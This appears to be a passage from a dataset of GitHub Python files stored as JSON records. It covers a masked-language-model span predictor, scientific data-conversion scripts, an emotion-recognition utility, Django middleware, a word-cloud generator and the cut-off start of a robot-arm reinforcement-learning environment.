all_start_and_end.add(ngram_pos)\n\n start_token_idx -= 1\n\n return all_start_indices, all_end_indices, all_start_and_end\n\n def get_scores(start_indices, end_indices):\n x = self.dstore.get_embs(start_indices)\n x = torch.from_numpy(x).cuda()\n start_scores = self.get_scores(start_query_tensor, x)[0]\n start_scores = start_scores.detach().cpu().numpy()\n\n x = self.dstore.get_embs(end_indices)\n x = torch.from_numpy(x).cuda()\n end_scores = self.get_scores(end_query_tensor, x)[0]\n 
end_scores = end_scores.detach().cpu().numpy()\n\n return start_scores, end_scores\n\n # main code starts from here\n if self.dstore.restricted:\n # find passaages to restricted\n if query_text in self.dstore.restricted_dict:\n block_ids = self.dstore.restricted_dict[query_text]\n else:\n block_ids = self.dstore.searcher.search(query_text, is_question=is_question)\n self.dstore.restricted_dict[query_text] = block_ids\n\n valid_idxs = []\n for block_id in block_ids:\n start, end = self.dstore.orig_block_idx_to_emb_token_idx[block_id:block_id+2]\n valid_idxs += list(range(start, end))\n start_indices = np.array([valid_idxs])\n end_indices = np.array([valid_idxs])\n\n else:\n _, start_indices = self.dstore.search(start_query, k=self.k)\n _, end_indices = self.dstore.search(end_query, k=self.k)\n\n if start_indices.shape[1]==end_indices.shape[1]==0:\n for alpha in alphas:\n predictions[\"a={}\".format(alpha)] = None\n return predictions\n\n if self.dstore.restricted:\n start_scores, end_scores = get_scores(start_indices, end_indices)\n _, _, all_start_and_end = get_candidates(start_indices, end_indices)\n\n all_start_indices = start_indices[0].tolist()\n all_end_indices = end_indices[0].tolist()\n all_start_scores = start_scores\n all_end_scores = end_scores\n\n else:\n all_start_indices, all_end_indices, all_start_and_end = get_candidates(start_indices, end_indices)\n\n all_start_indices = sorted(all_start_indices)\n all_end_indices = sorted(all_end_indices)\n\n all_start_scores, all_end_scores = get_scores(all_start_indices, all_end_indices)\n\n all_start_scores = softmax(all_start_scores / self.temperature, -1)\n all_end_scores = softmax(all_end_scores / self.temperature, -1)\n\n idx2start_score = {start_token_idx: score for start_token_idx, score\n in zip(all_start_indices, all_start_scores)}\n idx2end_score = {end_token_idx: score for end_token_idx, score\n in zip(all_end_indices, all_end_scores)}\n\n pos2score = {}\n ngram2score = defaultdict(list)\n\n # now, assign scores to possible ngrams\n for (start, end) in all_start_and_end:\n assert start in idx2start_score\n assert end in idx2end_score\n score = idx2start_score[start] + idx2end_score[end]\n\n pos2score[(start, end)] = score\n ngram2score[tuple(pos2ngram[(start, end)])].append(score)\n\n if len(pos2score)==len(ngram2score)==0:\n for alpha in alphas:\n predictions[\"a={}\".format(alpha)] = None\n return predictions\n\n assert len(pos2score)>0 and len(ngram2score)>0\n\n for alpha in alphas:\n def key_func(x, alpha=alpha):\n return -np.sum(x[1]) * np.power(len(x[0]), alpha)\n\n top1_ngram_score_pair = min(ngram2score.items(), key=key_func)\n top1_ngram = list(top1_ngram_score_pair[0])\n\n predictions[\"a={}\".format(alpha)] = top1_ngram\n\n if return_metadata:\n metadata = {\"input\": query_text}\n if self.dstore.restricted:\n metadata[\"blocks\"] = [self.decode(self.dstore.input_ids[block_id]) for block_id in block_ids]\n\n metadata[\"pos2score\"] = pos2score\n metadata[\"pos2ngram\"] = pos2ngram\n metadata[\"ngram2score\"] = ngram2score\n\n predicted_ngram = predictions[\"a=0.0\"]\n metadata[\"predicted\"] = self.decode(predicted_ngram)\n predicted_spans = []\n for pos, ngram in pos2ngram.items():\n if ngram==predicted_ngram:\n\n block_id_s = self.dstore.token_idx_to_block_idx[pos[0]]\n local_id_s = self.dstore.token_idx_to_local_idx[pos[0]]\n block_id_e = self.dstore.token_idx_to_block_idx[pos[1]]\n local_id_e = self.dstore.token_idx_to_local_idx[pos[1]]\n assert block_id_s==block_id_e\n\n input_ids = 
self.dstore.input_ids[block_id_s]\n                    decoded = self.decode(input_ids[:local_id_s]) + \\\n                            colored(self.decode(input_ids[local_id_s:local_id_e+1]), \"red\") + \\\n                            self.decode(input_ids[local_id_e+1:])\n\n                    predicted_spans.append((decoded, pos2score[pos]))\n\n            metadata[\"predicted_spans\"] = sorted(predicted_spans, key=lambda x: -x[1])\n            return predictions, metadata\n\n        return predictions\n\n    def get_query(self, input_text):\n        inputs = self.model.tokenizer(input_text)\n        input_ids = inputs[\"input_ids\"]\n        assert self.model.tokenizer.mask_token_id in input_ids\n        idx = input_ids.index(self.model.tokenizer.mask_token_id)\n        with torch.no_grad():\n            input_tensor = torch.LongTensor([input_ids]).cuda()\n            _, query = self.model.forward(input_tensor, idx)\n        return query\n\n    def evaluate_open(self, task):\n        all_predictions = []\n        mask = self.get_stopword_mask()\n        do_restricted = self.dstore is not None and self.dstore.restricted is not None\n\n        def valid_func(tokens):\n            return np.sum(mask[tokens])==0\n\n        if \"translation\" in str(task):\n            alphas = [0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0]\n            ngram_max = 20\n        else:\n            alphas = [0.0, 0.5, 1.0]\n            ngram_max = 10\n\n        for ex in tqdm(task.examples):\n            dic = self.predict_span(\n                ex[\"input\"],\n                ngram_max=ngram_max,\n                valid_func=valid_func,\n                alphas=alphas,\n                is_question=task.is_question,\n            )\n            dic = {k: '' if v is None else self.decode(v) for k, v in dic.items()}\n            all_predictions.append(dic)\n\n        # compute accuracy\n        references = [[normalize_answer(answer) for answer in ex[\"answers\"]] for ex in task.examples]\n        for k in all_predictions[0]:\n            predictions = [normalize_answer(p[k]) for p in all_predictions]\n            accs = [prediction in reference for prediction, reference in zip(predictions, references)]\n\n            if task.ngrams is not None:\n                accs_dict = defaultdict(list)\n                for acc, ngram in zip(accs, task.ngrams):\n                    accs_dict[ngram].append(acc)\n                acc = np.mean([np.mean(v) for k, v in accs_dict.items()])\n                print (\"\\t%s\\tMacro EM=%.1f%%\" % (k, 100*acc))\n            else:\n                acc = np.mean(accs)\n                print (\"\\t%s\\tEM=%.1f%%\" % (k, 100*acc))\n\n        return all_predictions\n\n\n","repo_name":"facebookresearch/NPM","sub_path":"npm/npm.py","file_name":"npm.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"53"}
+{"seq_id":"13512815514","text":"from dbaAutomator.functions import *\nfrom dbaAutomator.ref import *\nfrom ase.io import read\nfrom pymatgen.io.ase import AseAtomsAdaptor\nfrom pymatgen import Molecule\nimport os\nimport numpy as np\n\ninpath = \"./data/crystals\"\nnamelist = os.listdir(inpath)\noutpath = \"./data/singmol\"\n\n\nnocando = []\nfor name in namelist:\n    structID = name[:-3]\n    print(structID)\n    struct = read(os.path.join(inpath, name))\n    struct = AseAtomsAdaptor.get_structure(struct)\n    struct.make_supercell([4, 5, 7])\n    bondDict = getBondDict(struct, bondCutoff)\n    print(bondDict)\n    try:\n        singleMol = getCentralSingleMol(struct, bondDict)\n        #singleMol.to(filename=outpath+\"/\"+structID+\".xyz\")\n        mol = Molecule([], [])\n        for site in singleMol.items():\n            mol.append(str(site[1].specie), site[1].coords)\n        mol.to(filename=outpath+\"/\"+structID+\".xyz\")\n    except Exception:\n        nocando.append(structID)\n\nprint(nocando)\nnocando = np.array(nocando)\nnp.savetxt('nocandolist.csv', nocando, delimiter=' ', 
fmt='%s')\n","repo_name":"BLABABA/scripts","sub_path":"struct/extractSingleMol.py","file_name":"extractSingleMol.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"29179364712","text":"import cv2 as cv\r\nimport numpy as np\r\nfrom keras.models import load_model\r\nimport face_recognition\r\n\r\n\r\n############################################\r\n# Utility module\r\n# func 1: get_faces_from_image(image)\r\n# [Purpose] Given an image, return the face regions in it\r\n# func 2: get_emotion_from_roi(roi_gray)\r\n# [Purpose] Feed the preprocessed 48*48 grayscale face crop to the trained emotion classifier and get the emotion class\r\n# func 3: draw_faces_on_image(image, faces, emo_freq)\r\n# [Purpose] Draw boxes around the detected face regions on the image and label their emotion\r\n# func 4: rotate_bound(image, src_h, src_w, angle, i)\r\n# [Purpose] Rotate the image clockwise by a given angle, keeping it complete (no cropping)\r\n# func 5: draw_allround_faces_on_image(image)\r\n# [Purpose] Rotate the image through 360 degrees, detecting and drawing once per step\r\n# func 6: get_most_freq_emo(emo_freq)\r\n# [Purpose] Get the emotion that occurs most often in the tally\r\n# func 7: generate_frames(camera)\r\n# [Purpose] Real-time recognition from the front-end camera\r\n############################################\r\n\r\n\r\n# description: given an image, return the face regions in it\r\n# params: image\r\n# returns: face regions (a list of (top, right, bottom, left) tuples)\r\ndef get_faces_from_image(image):\r\n    # Option 1: use the OpenCV face detection classifier\r\n    # Convert the image to grayscale\r\n    # gray_image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n    # # Get the OpenCV face detection classifier\r\n    # face_classifier = cv.CascadeClassifier('pythonProject_copy/haarcascade_frontalface_alt2.xml')\r\n    # # Detect faces\r\n    # faces = face_classifier.detectMultiScale(image, scaleFactor=1.3, minNeighbors=5)\r\n\r\n    # Option 2: use the face_recognition module\r\n    face_locations = face_recognition.face_locations(image)\r\n    return face_locations\r\n\r\n\r\n# description: feed the preprocessed 48*48 grayscale face crop to the trained emotion classifier and get the emotion class\r\n# params: 48*48 grayscale image\r\n# returns: name of the emotion\r\ndef get_emotion_from_roi(roi_gray):\r\n    # Load the emotion classifier\r\n    classifier = load_model('pythonProject_copy/EmotionDetectionModel.h5')\r\n    # Text labels for the emotion classes\r\n    class_labels = ['Angry', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\r\n    # If roi_gray is all zeros (all black), there is no face in the region\r\n    if np.sum([roi_gray]) != 0:\r\n        roi = roi_gray.astype('float') / 255.0\r\n        roi = np.array(roi)\r\n        roi = np.expand_dims(roi, axis=0)\r\n        # Run the prediction\r\n        prediction = classifier.predict(roi)[0]\r\n        label = class_labels[prediction.argmax()]\r\n        return label\r\n    else:\r\n        return 'No Face Found'\r\n\r\n\r\n# description: draw boxes around the detected face regions on the image and label their emotion\r\n# params: image, face regions, emotion frequency tally\r\n# returns: none\r\ndef draw_faces_on_image(image, faces, emo_freq):\r\n    for (top, right, bottom, left) in faces:\r\n        # Draw the rectangle with cv\r\n        cv.rectangle(image, (left, top), (right, bottom), color=(255, 0, 0), thickness=2)\r\n        # Use the region as the ROI for emotion recognition\r\n        roi = image[top:bottom, left:right]\r\n        # Convert to grayscale\r\n        roi_gray = cv.cvtColor(roi, cv.COLOR_BGR2GRAY)\r\n        # Resize to a uniform size\r\n        roi_gray = cv.resize(roi_gray, (48, 48), interpolation=cv.INTER_AREA)\r\n        # Classify the emotion and write its name on the image\r\n        label = get_emotion_from_roi(roi_gray)\r\n        label_position = (left, top)\r\n        cv.putText(image, label, label_position, cv.FONT_HERSHEY_SIMPLEX, fontScale=1, color=(0, 255, 0),\r\n                   thickness=2)\r\n        # Increment the count for that emotion\r\n        emo_freq[label] += 1\r\n\r\n\r\n# description: rotate the image by a given angle, keeping it complete (no cropping)\r\n# params: image, rotation angle\r\n# returns: the rotated image\r\ndef rotate_bound(image, src_h, src_w, angle, i):\r\n    # Get the image height, width and center coordinates\r\n    actual_h, actual_w = image.shape[:2]\r\n    (center_x, center_y) = (actual_w // 2, actual_h // 2)\r\n    if i == 0:\r\n        return image\r\n    else:\r\n        # Build the rotation matrix (angle is negated to rotate clockwise), scale factor = 1.0\r\n        rotation_matrix = cv.getRotationMatrix2D(center=(center_x, center_y), angle=-angle, scale=1.0)\r\n
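        # For intuition on the canvas math below (illustrative numbers, not\r\n        # from this project): rotating a w=100, h=200 image by 90 degrees needs\r\n        # new_width = h*|sin| + w*|cos| = 200 and new_height = h*|cos| + w*|sin| = 100,\r\n        # so the whole rotated image still fits on the enlarged canvas.\r\n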
        # The rotation matrix used to compute the actual canvas size: its angle is relative to the original image (otherwise the canvas would keep growing)\r\n        fake_matrix = cv.getRotationMatrix2D(center=(center_x, center_y), angle=-angle * i, scale=1.0)\r\n        cos = np.abs(fake_matrix[0, 0])\r\n        sin = np.abs(fake_matrix[0, 1])\r\n        # To keep the rotated image complete, enlarge the canvas; the new canvas dimensions are:\r\n        new_width = int((src_h * sin) + (src_w * cos))\r\n        new_height = int((src_h * cos) + (src_w * sin))\r\n        # Translate the image -> shift the center point\r\n        rotation_matrix[0, 2] += (new_width / 2) - center_x\r\n        rotation_matrix[1, 2] += (new_height / 2) - center_y\r\n\r\n        rotated_image = cv.warpAffine(image, rotation_matrix, (new_width, new_height), borderValue=(0, 0, 0))\r\n        return rotated_image\r\n\r\n\r\n# description: rotate the image through 360 degrees, detecting and drawing once every 45 degrees\r\n# params: image\r\n# returns: the annotated image with faces boxed and emotions labeled over 360 degrees, plus a dict of emotion frequencies\r\ndef draw_allround_faces_on_image(image):\r\n    emo_freq = {\r\n        'Angry': 0, 'Fear': 0, 'Happy': 0, 'Neutral': 0, 'Sad': 0, 'Surprise': 0\r\n    }\r\n    # Rotation step and total number of rotations\r\n    ANGLE = 45\r\n    TIMES = 360 // ANGLE\r\n    # Width and height of the original image\r\n    (IMG_H, IMG_W) = image.shape[:2]\r\n    # List of faces already annotated\r\n    drawn_faces_encoding = []\r\n    for i in np.arange(TIMES):\r\n        i_right_faces = []\r\n        image = rotate_bound(image, IMG_H, IMG_W, ANGLE, i)\r\n        i_faces_loc = get_faces_from_image(image)\r\n        for (top, right, bottom, left) in i_faces_loc:\r\n            # Compare face similarity\r\n            face_img_encoding = face_recognition.face_encodings(image[top:bottom, left:right, :], known_face_locations=[\r\n                (0, right - left, bottom - top, 0)])\r\n            if len(face_img_encoding) != 0:\r\n                is_same_face = face_recognition.compare_faces(drawn_faces_encoding, face_img_encoding[0], tolerance=0.5)\r\n                # If the face matches one already in drawn_faces_encoding, skip annotating this face_img to avoid duplicates\r\n                if ~np.array(is_same_face).any():\r\n                    i_right_faces.append((top, right, bottom, left))\r\n                    drawn_faces_encoding.append(face_img_encoding[0])\r\n        draw_faces_on_image(image, i_right_faces, emo_freq)\r\n        # # Show the rotation process\r\n        # cv.imshow('rotated image:', image)\r\n        # cv.waitKey()\r\n    # Rotate one last time to restore the original orientation\r\n    image = rotate_bound(image, IMG_H, IMG_W, ANGLE, TIMES)\r\n    print('The image is drawn')\r\n    return image, emo_freq\r\n\r\n\r\n# description: get the emotion that occurs most often in the tally\r\n# params: emotion -> count dict\r\n# return: the name of the most frequent emotion\r\ndef get_most_freq_emo(emo_freq):\r\n    find_max = max(emo_freq, key=emo_freq.get)\r\n    return find_max\r\n\r\n\r\n# description: real-time recognition from the front-end camera\r\ndef generate_frames(camera):\r\n    # Load the face detection and emotion recognition models\r\n    face_classifier = cv.CascadeClassifier('haarcascade_frontalface_alt2.xml')\r\n    classifier = load_model('EmotionDetectionModel.h5')\r\n    class_labels = ['Angry', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\r\n    while True:\r\n        ## read the camera frame\r\n        success, frame = camera.read()\r\n        # Detect faces and label emotions on the frame\r\n        gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n        faces = face_classifier.detectMultiScale(gray, 1.3, 5)\r\n\r\n        for (x, y, w, h) in faces:\r\n            cv.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n            roi_gray = gray[y:y + h, x:x + w]\r\n            roi_gray = cv.resize(roi_gray, (48, 48), interpolation=cv.INTER_AREA)\r\n\r\n            if np.sum([roi_gray]) != 0:\r\n                roi = roi_gray.astype('float') / 255.0\r\n                roi = np.array(roi)\r\n                roi = np.expand_dims(roi, axis=0)\r\n\r\n                preds = classifier.predict(roi)[0]\r\n                label = class_labels[preds.argmax()]\r\n                label_position = (x, y)\r\n                cv.putText(frame, label, label_position, cv.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 3)\r\n            else:\r\n                cv.putText(frame, 'No Face Found', (20, 20), cv.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 3)\r\n\r\n        if not success:\r\n            break\r\n        else:\r\n            ret, buffer = cv.imencode('.jpg', frame)\r\n            frame = buffer.tobytes()\r\n\r\n            yield (b'--frame\\r\\n'\r\n                   b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\r\n
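\r\n# Note: this generator produces a multipart/x-mixed-replace MJPEG stream; in the\r\n# Flask app that serves it (not part of this module) it would typically be\r\n# wrapped as, e.g.:\r\n#   Response(generate_frames(camera), mimetype='multipart/x-mixed-replace; boundary=frame')\r\n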
","repo_name":"TangHuiling/NKU_22","sub_path":"Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"40620838550","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass TSPredictor:\n    def __init__(self, model_path,vectorize_layer_path):\n        self.model_path = model_path\n        self.model = tf.keras.models.load_model(self.model_path)\n        self.vectorize_layer_path = vectorize_layer_path\n        self.loaded_vectorize_layer_model = tf.keras.models.load_model(self.vectorize_layer_path)\n        \n    def preprocess(self, raw_text):\n        # Uses the trained vectorization layer to preprocess the text\n        loaded_vectorize_layer = self.loaded_vectorize_layer_model.layers[-1]\n        return loaded_vectorize_layer(raw_text)[np.newaxis, :] # Creates a new axis for batch size\n\n    def infer(self, text):\n        pred = self.model.predict(text)\n        return {'output':pred.tolist()}\n\n\nif __name__ == "__main__":\n    text = "text"\n    file_path = "./models/1/vectorize_layer"\n    model_path = "./models/1/TSModel.hdf5"\n    predictor = TSPredictor(model_path,file_path)\n    print(predictor.infer(predictor.preprocess(text)))\n","repo_name":"Marshall-mk/TweetsSentimentProject","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70017762407","text":"from django.conf import settings\nfrom django.shortcuts import redirect\nfrom django.utils.deprecation import MiddlewareMixin\nfrom django.utils import timezone\n\n\nclass LoginRequiredMiddleware(MiddlewareMixin):\n    def process_request(self, request):\n\n        exclude_paths = [\n            '/logout/','/admin/','/admin/login/'\n        ]\n\n        if not request.user.is_authenticated:\n            if not request.path == settings.LOGIN_URL:\n                if request.path not in exclude_paths:\n                    return redirect(settings.LOGIN_URL)\n\n        else:\n            if request.path == settings.LOGIN_URL:\n                return redirect(settings.INIT_URL)","repo_name":"Dandresfsoto/semaforos","sub_path":"web/semaforos/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7842604861","text":"import jieba, codecs, sys, pandas\nimport numpy as np\nfrom imageio import imread\nfrom wordcloud import WordCloud, ImageColorGenerator\nfrom os import listdir\nfrom os.path import isfile, join\nimport matplotlib.pyplot as plt\n\n#\n# To work properly, this script needs two files:\n# - a .txt file containing the Chinese stopwords\n# - a .ttf file containing the font to use\n#\n# These files are kept in a data/ subfolder\n#\n#\n\n\n\nstopwords_filename = 'data/stopwords_zh.txt'\nfont_filename = 'data/simkai.ttf'\n\ndef contain_latin(txt):\n    # True if txt contains any lowercase Latin letter\n    return any(ch in txt for ch in 'abcdefghijklmnopqrstuvwxyz')\n\ndef filter_numbers(txt):\n    \"\"\"\n    Decides whether a token should be kept:\n    - returns False if the string is a run of digits of length > 4\n    - returns True otherwise\n
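\n    Illustrative examples (hypothetical inputs):\n        filter_numbers('123456') -> False   # long digit run, dropped\n        filter_numbers('2024')   -> True    # year-like, kept\n        filter_numbers('abc')    -> True    # not purely numeric, kept\n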
à 4\n - renvoie False si la chaîne est une suite de chiffres de longueur > 4\n - True sinon\n\n But = ne garder que les nombres assimilables à des années, ou éventuellement\n des pourcentages\n \"\"\"\n if txt.isdigit() and len(txt) > 4:\n return False\n else:\n return True\n\ndef main(input_filename):\n content = '\\n'.join([line.strip()\n for line in codecs.open(input_filename, 'r', 'utf-8')\n if len(line.strip()) > 0])\n stopwords = set([line.strip()\n for line in codecs.open(stopwords_filename, 'r', 'utf-8')])\n\n segs = jieba.cut(content)\n words = []\n for seg in segs:\n word = seg.strip().lower()\n # nettoyage des mots indésirables\n if len(word) > 1 and word not in stopwords and not contain_latin(word) and filter_numbers(word) and word != '-%':\n words.append(word)\n\n words_df = pandas.DataFrame({'word':words})\n words_stat = words_df.groupby(by=['word'])['word'].agg(number=np.size)\n words_stat = words_stat.reset_index().sort_values(by=\"number\",ascending=False)\n\n print('# of different words =', len(words_stat))\n\n wordcloud = WordCloud(font_path=font_filename, max_font_size=50, random_state=100, max_words=100, background_color=\"white\")\n wordcloud = wordcloud.fit_words(dict(words_stat.head(4000).itertuples(index=False)))\n print(\"Sauvegarde du nuage\")\n wordcloud.to_file('nuage_chinois.png')\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n main(sys.argv[1])\n else:\n print('[usage] <input>')\n","repo_name":"cbuontal/M1TAL_immigration","sub_path":"scripts/nuage_chinois.py","file_name":"nuage_chinois.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15696920729","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nfrom numpy import array, dot, shape, transpose\nfrom numpy.linalg import det, svd\n\n\ndef superpose(nodes1, nodes2, select1, select2):\n vecs1 = array(nodes1)[array(select1)]\n vecs2 = array(nodes2)[array(select2)]\n print(vecs1, vecs2)\n\n n_vec, vec_size = shape(vecs1)\n center1 = sum(vecs1, 0) / float(n_vec)\n center2 = sum(vecs2, 0) / float(n_vec)\n vecs1 -= center1\n vecs2 -= center2\n\n V, S, W_trans = svd(dot(transpose(vecs2), vecs1))\n\n is_reflection = (det(V) * det(W_trans)) < 0.0\n if is_reflection:\n V[-1, :] = V[-1, :] * (-1.0)\n\n optimal_rotation = dot(V, W_trans)\n return dot(array(nodes2) - center2, optimal_rotation) + center1\n\n# a = [ (1,1), (4,4), (1,4) ]\n# b = [ (0,3), (3,0), (3,3), (5,5) ]\n\n# print superpose(a, b, (0,1,2), (0,1,2))\n","repo_name":"RupaliBhati/Traffic-Light-Control-using-Reinforcement-Learning","sub_path":"tools/lib/rmsd.py","file_name":"rmsd.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"4493705459","text":"\"\"\"empty message\n\nRevision ID: fdd27ceacc26\nRevises: 452b89f3e9be\nCreate Date: 2020-08-26 20:59:21.462885\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fdd27ceacc26'\ndown_revision = '452b89f3e9be'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('back',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('uname', sa.String(length=10), nullable=True),\n sa.Column('backwords', sa.Text(), nullable=False),\n sa.Column('date', sa.Date(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('back')\n # ### end Alembic commands ###\n","repo_name":"xyj228/weibo","sub_path":"migrations/versions/fdd27ceacc26_.py","file_name":"fdd27ceacc26_.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41683410064","text":"from struct import *\nimport numpy as np\n# I considered using the multiprocessing package, but this version reads fast enough.\n# A multiprocessing variant that speeds up the reading is welcome.\n# from joblib import Parallel, delayed\nimport multiprocessing\nimport time\nfrom scipy import misc\nimport os\nimport argparse\nfrom progressbar import ProgressBar\nfrom skimage.measure import block_reduce\n\n\ndef bin2array(file):\n start_time = time.time()\n with open(file, 'rb') as f: # binary mode so struct.unpack receives bytes\n float_size = 4\n uint_size = 4\n total_count = 0\n cor = f.read(float_size * 3)\n cors = unpack('fff', cor)\n # print(\"cors is {}\",cors)\n cam = f.read(float_size * 16)\n cams = unpack('ffffffffffffffff', cam)\n # print(\"cams %16f\",cams)\n vox = f.read()\n numC = len(vox) // uint_size # floor division: 'I' * numC needs an int\n # print('numC is {}'.format(numC))\n checkVoxValIter = unpack('I' * numC, vox)\n checkVoxVal = checkVoxValIter[0::2]\n checkVoxIter = checkVoxValIter[1::2]\n checkVox = [\n i for (val, repeat) in zip(checkVoxVal, checkVoxIter)\n for i in np.tile(val, repeat)\n ]\n # print('checkVox shape is {}'.format(len(checkVox)))\n checkVox = np.reshape(checkVox, (240, 144, 240))\n checkVox = block_reduce(checkVox, block_size=(3, 3, 3), func=np.max)\n f.close()\n # print \"reading voxel file takes {} mins\".format((time.time()-start_time)/60)\n return checkVox\n\n\ndef png2array(file):\n image = misc.imread(file)\n image = misc.imresize(image, 50)\n return image\n\n\nclass ScanFile(object):\n def __init__(self, directory, prefix=None, postfix='.bin'):\n self.directory = directory\n self.prefix = prefix\n self.postfix = postfix\n\n def scan_files(self):\n files_list = []\n\n for dirpath, dirnames, filenames in os.walk(self.directory):\n for special_file in filenames:\n if self.postfix:\n if special_file.endswith(self.postfix):\n files_list.append(os.path.join(dirpath, special_file))\n elif self.prefix:\n if special_file.startswith(self.prefix):\n files_list.append(os.path.join(dirpath, special_file))\n else:\n files_list.append(os.path.join(dirpath, special_file))\n\n return files_list\n\n def scan_subdir(self):\n subdir_list = []\n for dirpath, dirnames, files in os.walk(self.directory):\n subdir_list.append(dirpath)\n return subdir_list\n\n\nif __name__ == "__main__":\n\n parser = argparse.ArgumentParser(description='Parser added')\n parser.add_argument(\n '-s',\n action=\"store\",\n dest=\"dir_src\",\n default=\"/media/wangyida/D0-P1/database/SUNCGtrain_3001_5000\",\n help='folder of paired depth and voxel')\n parser.add_argument(\n '-td',\n action=\"store\",\n dest=\"dir_tar_depth\",\n default=\"/media/wangyida/D0-P1/database/SUNCGtrain_3001_5000_depvox\",\n help='for storing generated npy')\n parser.add_argument(\n '-tv',\n action=\"store\",\n dest=\"dir_tar_voxel\",\n 
default=\"/media/wangyida/D0-P1/database/SUNCGtrain_3001_5000_depvox\",\n help='for storing generated npy')\n parser.print_help()\n results = parser.parse_args()\n\n # folder of paired depth and voxel\n dir_src = results.dir_src\n # for storing generated npy\n dir_tar_depth = results.dir_tar_depth\n dir_tar_voxel = results.dir_tar_voxel\n\n # scan for depth files\n scan_png = ScanFile(directory=dir_src, postfix='.png')\n files_png = scan_png.scan_files()\n\n # scan for semantic voxel files\n scan_bin = ScanFile(directory=dir_src, postfix='.bin')\n files_bin = scan_bin.scan_files()\n\n # making directories\n try:\n os.stat(dir_tar_voxel)\n except:\n os.mkdir(dir_tar_voxel)\n try:\n os.stat(dir_tar_depth)\n except:\n os.mkdir(dir_tar_depth)\n\n pbar1 = ProgressBar()\n # save depth as npy files\n for file_png in pbar1(files_png):\n depth = png2array(file=file_png)\n name_start = int(file_png.rfind('/'))\n name_end = int(file_png.find('.', name_start))\n np.save(dir_tar_depth + file_png[name_start:name_end] + '.npy', depth)\n\n # save voxel as npy files\n pbar2 = ProgressBar()\n for file_bin in pbar2(files_bin):\n voxel = bin2array(file=file_bin)\n name_start = int(file_bin.rfind('/'))\n name_end = int(file_bin.find('.', name_start))\n np.save(dir_tar_voxel + file_bin[name_start:name_end] + '.npy', voxel)\n","repo_name":"wangyida/gan-depth-semantic3d","sub_path":"data/depthbin2npy.py","file_name":"depthbin2npy.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"3351827469","text":"import pybullet as p\nimport pybullet_data\nimport numpy as np\nfrom itertools import chain\nimport ray\nimport time\nimport torch\nimport traceback\nfrom .UR5 import UR5\nfrom .utils import (\n get_observation_dimensions,\n create_ur5s,\n pose_to_high_freq_pose,\n pos_to_high_freq_pos\n)\nfrom .tasks import TaskManager\nfrom policy import Memory\n\n\nclass BaseEnv:\n SIMULATION_TIMESTEP = 1.0 / 240.0\n\n def __init__(self, env_config, training_config, gui, logger):\n self.logger = logger\n self.setup(env_config, training_config, gui)\n self.task_manager = TaskManager(\n config={\n 'environment': env_config,\n 'training': training_config\n },\n task_loader=training_config['task_loader'],\n colors=[ur5.color for ur5 in self.all_ur5s])\n\n def setup_action_observation(self, observations_config):\n self.obs_key = [\n obs_item['name']\n for obs_item in observations_config['items']\n ]\n self.action_dim = UR5.joints_count\n\n self.observation_items = observations_config['items']\n observation_dim = get_observation_dimensions(observations_config)\n\n self.actor_observation_dim = observation_dim\n self.critic_observation_dim = observation_dim\n\n def set_memory_cluster_map(self, memory_cluster_map):\n self.memory_cluster_map = memory_cluster_map\n\n def setup(self, env_config, training_config, gui):\n self.action_interval = env_config[\"action_interval\"]\n self.episode_length = env_config[\"episode_length\"]\n self.simulation_steps_per_action_step = int(\n self.action_interval / BaseEnv.SIMULATION_TIMESTEP)\n self.episode_counts = 0\n self.action_type = 'delta'\\\n if 'action_type' not in env_config \\\n else env_config['action_type']\n self.observations = None\n self.gui = gui\n self.ray_id = None\n # Get variables from config\n self.max_ur5s_count = env_config['max_ur5s_count']\n self.max_task_ur5s_count = env_config['max_ur5s_count']\n self.min_task_ur5s_count = env_config['min_ur5s_count']\n self.survival_penalty = 
